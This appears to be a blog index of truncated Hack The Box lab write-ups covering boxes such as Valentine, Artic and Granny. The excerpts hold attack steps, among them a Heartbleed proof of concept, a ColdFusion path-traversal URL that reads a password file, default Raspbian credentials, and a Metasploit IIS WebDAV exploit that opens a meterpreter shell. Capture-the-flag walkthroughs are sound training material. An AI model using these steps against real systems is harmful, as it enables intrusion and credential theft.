Pages

Search

HTB Valentine

$ sudo nmap -T4 -A -p- 10.10.10.79 $ gobuster dir -u https://10.10.10.79 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -k $ nikto -h 10.10.10.79 $ sudo nmap –script vuln -p 80 10.10.10.79 $ sudo nmap –script vuln -p 443 10.10.10.79 Based on these results, this box is Heartbleed vulnerable. https://github.com/sensepost/heartbleed-poc $ python heartbleed-poc.py 10.10.10.79 $ strings dump.bin Using https://www.base64decode.org/ aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==heartbleedbelievethehype Access to https://10.10.10.79/dev https://10.10.10.79/dev/notes.txt https://10.10.10.79/dev/hype_key This is hexadecimal encoding. If we use a hexa

HTB Shocker

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- shocker.htb We just have an Apache on port 80 and OpenSSH on port 2222. Access to http://shocker.htb ruben@kali:~/htb$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirb/common.txt -e We have a cgi-bin folder that may contain script files. Let’s use again Gobuster but this time searching files by file type.(.sh,.py) $ gobuster dir -u http://shocker.htb/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -x py -x sh Based on the box name

HTB Mirai

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- mirai.htb If we access to http://mirai.htb, There is another http port. Access to http://mirai.htb:32400 to be finally redirected to http://mirai.htb:32400/web/index.html As descrived by Nmap results, we have a Plex Media server. ruben@kali:~/htb/mirai$ gobuster dir -u http://10.10.10.48 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e –wildcard Access to http://mirai.htb/admin/ So, do we have a Raspberry maybe using Raspbian?Default Raspbian credentials are pi:raspberry As we have SSH open, we can try

HTB Bank

ruben@kali:~/htb/bank$ nmap -sV -T4 -p- 10.10.10.29 There is an Apache 2.4.7 on port 80 and a DNS Server on port 53.If you access to http://10.10.10.29 there is an Apache2 default site. As there is a DNS Server active may seem worth if we add the hostname to the /etc/hosts.All HTB machines have the same pattern: Box_name.htb After this step, if we access to http://bank.htb we obtain a more promising site. ruben@kali:~/htb/bank$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

HTB Beep

$nmap -p- -T4 -A 10.10.10.7 Results: $gobuster dir -u 10.10.10.7:443 -w /usr/share/wordlists/dirb/big.txt -e -o beep.out -k Access to https://10.10.10.7/ So, this box contains an Elastix instance. According to Wikipedia description: Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialing. The Elastix 2.5 functionality is

HTB Artic

$sudo nmap -A -T4 -p- 10.10.10.11 8500/tcp open fmtp?This is an odd open port. Let’s check it. Access to http://10.10.10.11:8500/ These files are part of a Cold Fusion 8 installation.http://10.10.10.11:8500/CFIDE/administrator/ $searchsploit ColdFusion $searchsploit -x 14641 Access to http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en What is Rds? ColdFusion RDS is a security component of ColdFusion Server used by the ColdFusion Administratorand ColdFusion Studio to provide remote HTTP-access to files and databases.You can use RDS to manage

GIT Workflow

HTB Blocky

$nmap -T4 -p- -sV -A 10.10.10.37 Open Ports: 21/tcp    open   ftp       ProFTPD 1.3.5a 22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu)) 25565/tcp open   minecraft Minecraft 1.11.2 http-generator: WordPress 4.8 $gobuster dir -u 10.10.10.37 -w /usr/share/wordlists/dirb/common.txt -e PhpMyAdmin login site: WordPress admim login site: Uploads folder

HTB Granny

$nmap -T4 -A -sV -p- 10.10.10.15 $nmap -p 80 –script vuln 10.10.10.15 $gobuster dir -u 10.10.10.15 -w /usr/share/wordlists/dirb/common.txt -e $nikto -h 10.10.10.15 Based on Grandpa’s vulnerability… msf5 > search CVE-2017-7269 msf5 > use 0 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) >set rhosts 10.10.10.15  msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.8 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run meterpreter > getuid meterpreter > shell c:\windows\system32\inetsrv>whoami meterpreter > run post/multi/recon/local_exploit_suggester  meterpreter > getpid meterpreter > ps

HTB Grandpa

$nmap -T4 -sV -A -p- 10.10.10.14 Open Ports: 80/tcp open http Microsoft IIS httpd 6.0 This format seems to be an old version of IIS.According to https://es.wikipedia.org/wiki/Internet_Information_Services, we are working with a Windows Vista (Solo Business y Ultimate) y Windows Server 2008. $gobuster dir -u 10.10.10.14 -w /usr/share/wordlists/dirb/common.txt -e $nikto -h 10.10.10.14 Seems that IIS 6.0 is vulnerable to a zero-day Buffer Overflow vulnerability (CVE-2017-7269).Let’s follow this path. More information